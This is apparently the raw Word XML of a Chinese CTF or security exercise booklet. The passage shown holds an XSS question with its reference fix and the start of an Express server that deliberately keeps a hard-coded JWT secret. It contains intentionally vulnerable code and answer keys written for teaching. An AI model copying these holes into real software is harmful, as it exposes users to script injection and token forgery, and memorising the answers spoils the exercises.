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57692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62A8E" w14:textId="6E2B0D76" w:rsidR="00666B44" w:rsidRDefault="00666B44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BF03A20" w14:textId="5474052D" w:rsidR="00D87851" w:rsidRDefault="00666B4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5120" w:history="1">
            <w:r w:rsidR="00D87851" w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidR="00D87851">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D87851">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D87851">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> </w:instrText>
            </w:r>
            <w:r w:rsidR="00D87851">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText>PAGEREF _Toc190815120 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00D87851">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> </w:instrText>
            </w:r>
            <w:r w:rsidR="00D87851">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D87851">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D87851">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00D8785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F2A350" w14:textId="6EBACA43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21" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>未过滤的评论陷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6FE4B2" w14:textId="16C73475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22" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>基于JWT密钥泄露的垂直越权攻击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A52FB8" w14:textId="49D4A458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23" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>时间管理局的留言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248261" w14:textId="1D8F3F56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24" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>消失的开发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AAA997" w14:textId="30E2F070" w:rsidR="00D87851" w:rsidRDefault="00D8785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25" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Rever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38E456" w14:textId="22C62934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26" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>破碎的许可证验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9CB952" w14:textId="6C133559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27" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>破碎的ELF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7E3EDA" w14:textId="4AE5A39E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28" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>逆向basi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3E16A6" w14:textId="6399EF15" w:rsidR="00D87851" w:rsidRDefault="00D8785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29" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Pw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F7B5E5" w14:textId="1C2730A0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30" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>太空电梯控制终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09F8FE" w14:textId="4BE1D51E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31" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>被遗忘的栈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A20A34" w14:textId="5B7767C8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32" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>破碎的时间沙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6E563D" w14:textId="04F9B222" w:rsidR="00D87851" w:rsidRDefault="00D8785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33" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Crypt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EF4AFC" w14:textId="2DEC6704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34" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>dp的背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1C83CE" w14:textId="7B4E2492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35" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ROT47的量子纠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F96302" w14:textId="44DE3296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36" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>黄金分割的密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581028" w14:textId="03984DC5" w:rsidR="00D87851" w:rsidRDefault="00D8785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37" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mis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708C7F" w14:textId="3959AD3D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38" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>量子艺术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AC64C" w14:textId="6A226080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39" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>时空漂流瓶（基础文件分析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260324" w14:textId="7C1D2E45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40" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>黑洞日志（流量分析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533208" w14:textId="27713645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41" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>量子隐写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B307FD" w14:textId="1255C6B8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42" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>被删除的会议记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465FC3" w14:textId="4E974ABA" w:rsidR="00D87851" w:rsidRDefault="00D8785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43" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mobil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D47010" w14:textId="7E51470B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44" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>火星探测器控制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DC06CE" w14:textId="77F28E68" w:rsidR="00D87851" w:rsidRDefault="00D8785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45" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Io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FDE361" w14:textId="7BBFECB0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46" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>智能门锁固件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08D236" w14:textId="71D36373" w:rsidR="00D87851" w:rsidRDefault="00D8785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47" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Eth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753085" w14:textId="218C91F9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48" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>星际银行漏洞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D31C0F" w14:textId="26F6AA4A" w:rsidR="00D87851" w:rsidRDefault="00D8785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49" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ai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E838B2" w14:textId="6BF8B9D2" w:rsidR="00D87851" w:rsidRDefault="00D8785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815150" w:history="1">
            <w:r w:rsidRPr="00480CD1">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>对抗样本迷宫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815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FB82F9" w14:textId="50D40F48" w:rsidR="00666B44" w:rsidRDefault="00666B4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5B98BDE" w14:textId="77777777" w:rsidR="00666B44" w:rsidRDefault="00666B44" w:rsidP="00BF10CA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42FAB213" w14:textId="77777777" w:rsidR="00666B44" w:rsidRDefault="00666B44">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="283B671A" w14:textId="2D952A3C" w:rsidR="00BF10CA" w:rsidRDefault="00AE63A7" w:rsidP="00BF10CA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc190815120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00BF10CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0AFFB192" w14:textId="22413C10" w:rsidR="00AE63A7" w:rsidRDefault="00AE63A7" w:rsidP="00AE63A7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc190815121"/>
      <w:r w:rsidRPr="00AE63A7">
        <w:t>未过滤的评论陷阱</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7E3B42CA" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>简单题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427E3E63" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>题目</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6124">
        <w:t>：请指出以下代码存在的安全漏洞，并给出修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C3150" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C7945" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t>&lt;!-- 用户评论展示功能 --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E75102D" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t>&lt;div id="comments"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFA7AD9" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73478AE8" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t xml:space="preserve">        const userComment = new URLSearchParams(window.location.search).get('comment');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA8C957" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t xml:space="preserve">        document.getElementById('comments').innerHTML = userComment; // 直接渲染用户输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5840C72D" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4825E882" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715590ED" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参考答案</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6124">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6124">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006E6124">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6124">
        <w:t>：存在XSS（跨站脚本攻击）漏洞，直接通过URL参数注入未过滤的HTML内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6124">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006E6124">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>修复方案</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6124">
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA5BBCC" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432269EF" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t>&lt;div id="comments"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A46D429" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A45F6AC" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t xml:space="preserve">    const userComment = new URLSearchParams(window.location.search).get('comment') || '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914ECCA" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t xml:space="preserve">    // 使用textContent替代innerHTML，并转义特殊字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CCE617" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t xml:space="preserve">    document.getElementById('comments').textContent = userComment;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A3B8A0" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EEBBC5" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t xml:space="preserve">    // 或使用DOMPurify库过滤（更安全）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A6791D" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t xml:space="preserve">    // document.getElementById('comments').innerHTML = DOMPurify.sanitize(userComment);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028133D1" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD8A28" w14:textId="77777777" w:rsidR="006E6124" w:rsidRPr="006E6124" w:rsidRDefault="006E6124" w:rsidP="006E6124">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6124">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>考察点</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6124">
        <w:t>：XSS攻击原理、输入输出过滤、安全渲染方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5B1413" w14:textId="54A3DBA5" w:rsidR="00AE63A7" w:rsidRDefault="0030699F" w:rsidP="0030699F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc190815122"/>
      <w:r w:rsidRPr="0030699F">
        <w:t>基于JWT密钥泄露的垂直越权攻击链</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="62E25C47" w14:textId="26C69034" w:rsidR="004D52D0" w:rsidRPr="004D52D0" w:rsidRDefault="004D52D0" w:rsidP="004D52D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52588964" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>// 修复后的代码（仅保留JWT密钥硬编码漏洞）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299BAB0E" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>const express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FDF6E0" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>const path = require('path');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F4D175" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>const fileUpload = require('express-fileupload');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B14466D" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>const app = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DEA408" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4797FA" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>// 中间件配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E4030" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:lastRenderedPageBreak/>
        <w:t>app.use(fileUpload());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1160B4" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>app.use(express.json());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B7CF8E" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A23F39" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>// 修复1：安全的文件上传接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68602FDE" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731958">
        <w:t>app.post('/upload', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D194066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if (!req.files || !req.files.userFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC86058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  return res.status(400).send('未选择文件');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E250144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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE3365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const file = req.files.userFile;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F66B2F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657A941B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// 漏洞修复：文件类型白名单验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A90CC32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const allowedTypes = ['image/jpeg', 'image/png'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF6525D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if (!allowedTypes.includes(file.mimetype)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C27619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  return res.status(403).send('仅允许上传JPEG/PNG图片');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A39A5BF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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10989C95" w14:textId="77777777" w:rsidR="00731958" w:rsidRPr="00731958" w:rsidRDefault="00731958" w:rsidP="00731958">
